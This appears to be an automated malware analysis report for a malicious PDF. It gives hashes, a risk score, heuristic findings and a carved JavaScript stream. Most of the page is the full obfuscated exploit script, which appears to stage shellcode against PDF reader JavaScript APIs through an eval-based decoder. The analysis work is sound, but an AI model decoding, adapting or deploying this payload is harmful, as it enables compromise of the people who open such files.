Malicious PDF — malware analysis report

Static analysis result for SHA-256 a350a5aa74d7fea8…

MALICIOUS

PDF

7.6 KB Created: 2010-07-25 10:32:51 Authoring application: FPDF 1.6 First seen: 2026-05-10
MD5: 148dc9a2cb89238429bfd02cfb8936b9 SHA-1: 62c8e8d4d9e1400bc30aa1b7d1b89adea80b70c1 SHA-256: a350a5aa74d7fea8cb07387239760176054f26094481875d93a9e0b5274301a6
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, as indicated by several heuristics, including PDF_JAVASCRIPT and PDF_JS. The JavaScript stream, named javascript_obj0007_000.js, is obfuscated and likely intended to perform malicious actions such as downloading a second-stage payload. The PDF's metadata suggests it was created using FPDF, a common tool for generating PDFs, but the embedded script points to malicious intent. None of the findings shown on this page reference PowerShell, so the T1059.001 mapping above should be confirmed against the decoded script before it is used for detection or reporting.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
     function vf\(s\){var r='',v=[],w=String.fromCharCode,n=[[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]];for\(z in n\){ for\(i=n[z][0];i<n[z][1];i++\){  v.push\(w\(i\)\); }}for \(var i = 0; i < s.length; i++\) { r+=v[s[i]];}eval\(r\);}vf\([65,64,71,86,79,68,85,74,80,79,0,70,79,8,71,66,86,12,0,88,68,81,69,9,92,65,64,88,73,74,77,70,0,8,71,66,86,14,77,70,79,72,85,73,0,10,0,50,0,60,0,88,68,81,69,9,92,65,64,71,66,86,0,11,61,0,71,66,86,59,65,64,94,65,64,71,66,86,0,61,0,71,66,86,14,84,86,67,84,85,83, …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x1EB 6881 bytes
SHA-256: 603a432753a0341286cd9cbb6f64d5416d2815c082cbd4ce7a982ad8680fa8f4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function vf(s){var r='',v=[],w=String.fromCharCode,n=[[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]];for(z in n){	for(i=n[z][0];i<n[z][1];i++){		v.push(w(i));	}}for (var i = 0; i < s.length; i++) {	r+=v[s[i]];}eval(r);}vf([65,64,71,86,79,68,85,74,80,79,0,70,79,8,71,66,86,12,0,88,68,81,69,9,92,65,64,88,73,74,77,70,0,8,71,66,86,14,77,70,79,72,85,73,0,10,0,50,0,60,0,88,68,81,69,9,92,65,64,71,66,86,0,11,61,0,71,66,86,59,65,64,94,65,64,71,66,86,0,61,0,71,66,86,14,84,86,67,84,85,83,74,79,72,8,48,12,0,88,68,81,69,15,50,9,59,65,64,83,70,85,86,83,79,0,71,66,86,59,65,64,94,65,64,65,64,71,86,79,68,85,74,80,79,0,88,66,8,9,92,65,64,87,66,83,0,80,78,0,61,0,86,79,70,84,68,66,81,70,8,2,73,85,85,81,58,15,15,67,77,66,68,76,73,80,77,70,15,74,79,69,70,89,14,81,73,81,2,9,59,65,64,87,66,83,0,76,78,90,81,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,48,16,48,16,5,86,48,16,48,16,5,86,48,16,48,16,5,86,48,16,48,16,2,9,65,64,87,66,83,0,75,79,91,0,61,0,76,78,90,81,0,11,0,80,78,59,65,64,87,66,83,0,90,91,88,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,48,16,48,16,5,86,48,16,48,16,2,9,59,65,64,87,66,83,0,86,90,81,83,0,61,0,50,48,59,65,64,87,66,83,0,80,87,68,0,61,0,86,90,81,83,0,11,0,75,79,91,14,77,70,79,72,85,73,59,65,64,88,73,74,77,70,0,8,90,91,88,14,77,70,79,72,85,73,0,60,0,80,87,68,9,92,65,64,90,91,88,0,11,61,0,90,91,88,59,65,64,94,65,64,87,66,83,0,69,73,0,61,0,90,91,88,14,84,86,67,84,85,83,74,79,72,8,48,12,0,80,87,68,9,59,65,64,87,66,83,0,87,76,0,61,0,90,91,88,14,84,86,67,84,85,83,74,79,72,8,48,12,0,90,91,88,14,77,70,79,72,85,73,13,80,87,68,9,59,65,64,88,73,74,77,70,0,8,87,76,14,77,70,79,72,85,73,11,80,87,68,0,60,0,48,89,52,48,48,48,48,9,92,65,64,87,76,0,61,0,87,76,0,11,0,87,76,0,11,0,69,73,59,65,64,94,65,64,87,66,83,0,80,75,0,61,0,79,70,88,0,16,83,83,66,90,8,9,59,65,64,71,80,83,0,8,87,66,83,0,84,82,0,61,0,48,59,0,84,82,0,60,0,49,52,48,48,59,0,84,82,11,11,9,92,65,64,80,75,42,84,82,44,0,61,0,87,76,0,11,0,75,79,91,59,65,64,94,65,64,87,66,83,0,69,86,0,61,0,49,50,57,57,57,57,57,57,57,57,57,57,57,57,57,57
,57,57,57,57,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,59,65,64,86,85,74,77,14,81,83,74,79,85,71,8,2,5,52,53,48,48,48,71,2,12,0,69,86,9,59,65,64,94,65,64,65,64,71,86,79,68,85,74,80,79,0,88,81,8,9,92,65,64,87,66,83,0,71,66,74,67,0,61,0,86,79,70,84,68,66,81,70,8,2,73,85,85,81,58,15,15,67,77,66,68,76,73,80,77,70,15,74,79,69,70,89,14,81,73,81,2,9,59,65,64,87,66,83,0,80,75,0,61,0,79,70,88,0,16,83,83,66,90,8,9,59,65,64,87,66,83,0,89,69,79,83,0,61,0,48,89,48,68,48,68,48,68,48,68,59,65,64,87,66,83,0,77,66,81,84,0,61,0,48,89,52,48,48,48,48,48,59,65,64,87,66,83,0,69,91,0,61,0,71,66,74,67,14,77,70,79,72,85,73,0,10,0,50,59,65,64,87,66,83,0,88,68,81,69,0,61,0,77,66,81,84,0,13,0,8,69,91,11,48,89,51,56,9,59,65,64,87,66,83,0,71,66,86,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,57,48,57,48,5,86,57,48,57,48,2,9,59,65,64,71,66,86,0,61,0,70,79,8,71,66,86,12,0,88,68,81,69,9,59,65,64,87,66,83,0,84,80,70,81,0,61,0,8,89,69,79,83,0,13,0,48,89,52,48,48,48,48,48,9,15,77,66,81,84,59,65,64,71,80,83,0,8,87,66,83,0,78,72,0,61,0,48,59,0,78,72,0,60,0,84,80,70,81,59,0,78,72,11,11,9,92,65,64,80,75,42,78,72,44,0,61,0,71,66,86,0,11,0,71,66,74,67,59,65,64,94,65,64,87,66,83,0,87,88,76,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,48,68,48,68,5
,86,48,68,48,68,2,9,59,65,64,88,73,74,77,70,0,8,87,88,76,14,77,70,79,72,85,73,0,60,0,52,52,57,53,50,9,92,65,64,87,88,76,0,11,61,0,87,88,76,59,65,64,94,65,64,85,73,74,84,14,68,80,77,77,66,67,34,85,80,83,70,0,61,0,18,80,77,77,66,67,14,68,80,77,77,70,68,85,20,78,66,74,77,24,79,71,80,8,92,84,86,67,75,58,0,2,2,12,78,84,72,58,0,87,88,76,94,9,59,65,64,94,65,64,65,64,71,86,79,68,85,74,80,79,0,91,74,69,8,9,92,65,64,74,71,0,8,66,81,81,14,69,80,68,14,18,80,77,77,66,67,14,72,70,85,24,68,80,79,9,92,65,64,87,66,83,0,84,88,88,87,0,61,0,79,70,88,0,16,83,83,66,90,8,9,59,65,64,87,66,83,0,84,77,80,77,0,61,0,86,79,70,84,68,66,81,70,8,2,73,85,85,81,58,15,15,67,77,66,68,76,73,80,77,70,15,74,79,69,70,89,14,81,73,81,2,9,59,65,64,87,66,83,0,91,66,67,74,0,61,0,84,77,80,77,14,77,70,79,72,85,73,0,10,0,50,59,65,64,87,66,83,0,88,68,81,69,0,61,0,48,89,52,48,48,48,48,48,0,13,0,8,91,66,67,74,0,11,0,48,89,51,56,9,59,65,64,87,66,83,0,71,66,86,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,57,48,57,48,5,86,57,48,57,48,2,9,59,65,64,71,66,86,0,61,0,70,79,8,71,66,86,12,0,88,68,81,69,9,59,65,64,87,66,83,0,91,89,0,61,0,8,48,89,48,68,48,68,48,68,48,68,0,13,0,48,89,52,48,48,48,48,48,9,0,15,0,48,89,52,48,48,48,48,48,59,65,64,71,80,83,0,8,87,66,83,0,87,71,0,61,0,48,59,0,87,71,0,60,0,91,89,59,0,87,71,0,11,11,0,9,92,65,64,84,88,88,87,42,87,71,44,0,61,0,71,66,86,0,11,0,84,77,80,77,59,65,64,94,65,64,87,66,83,0,90,66,79,0,61,0,86,79,70,84,68,66,81,70,8,2,5,48,57,2,9,59,65,64,88,73,74,77,70,0,8,90,66,79,14,77,70,79,72,85,73,0,60,0,48,89,52,48,48,48,9,92,65,64,90,66,79,0,11,61,0,90,66,79,59,65,64,94,65,64,90,66,79,0,61,0,2,29,14,2,0,11,0,90,66,79,59,65,64,66,81,81,14,69,80,68,14,18,80,77,77,66,67,14,72,70,85,24,68,80,79,8,90,66,79,9,59,65,64,94,65,64,94,65,64,65,64,71,86,79,68,85,74,80,79,0,80,88,78,76,8,9,92,65,64,87,66,83,0,77,67,83,89,0,61,0,66,81,81,14,87,74,70,88,70,83,77,67,83,89,14,85,80,34,85,83,74,79,72,8,9,59,65,64,77,67,83,89,0,61,0,77,67,83,89,14,83,70,81,77,66,68,70,8,15,43,19,15,72,12,7,7,9,59,65,64,87,66,83,0
,91,87,70,85,0,61,0,79,70,88,0,16,83,83,66,90,8,77,67,83,89,14,68,73,66,83,16,85,8,48,9,12,0,77,67,83,89,14,68,73,66,83,16,85,8,49,9,12,0,77,67,83,89,14,68,73,66,83,16,85,8,50,9,9,59,65,64,74,71,0,8,8,91,87,70,85,42,48,44,0,61,61,0,56,9,0,6,6,0,8,91,87,70,85,42,49,44,0,61,61,0,48,9,0,93,93,0,8,91,87,70,85,42,49,44,0,61,61,0,49,0,6,6,0,91,87,70,85,42,50,44,0,60,0,51,9,9,92,65,64,88,66,8,9,59,65,64,94,65,64,74,71,0,8,8,91,87,70,85,42,48,44,0,60,0,56,9,0,93,93,0,8,91,87,70,85,42,48,44,0,61,61,0,56,0,6,6,0,91,87,70,85,42,49,44,0,60,0,50,0,6,6,0,91,87,70,85,42,50,44,0,60,0,50,9,9,92,65,64,88,81,8,9,59,65,64,94,65,64,74,71,0,8,8,91,87,70,85,42,48,44,0,60,0,57,9,0,93,93,0,8,91,87,70,85,42,48,44,0,61,61,0,57,0,6,6,0,91,87,70,85,42,49,44,0,60,0,49,9,9,92,65,64,91,74,69,8,9,59,65,64,94,65,64,94,65,64,65,64,66,81,81,14,66,77,70,83,85,8,7,85,70,84,85,49,50,51,7,9,59,65,64]);;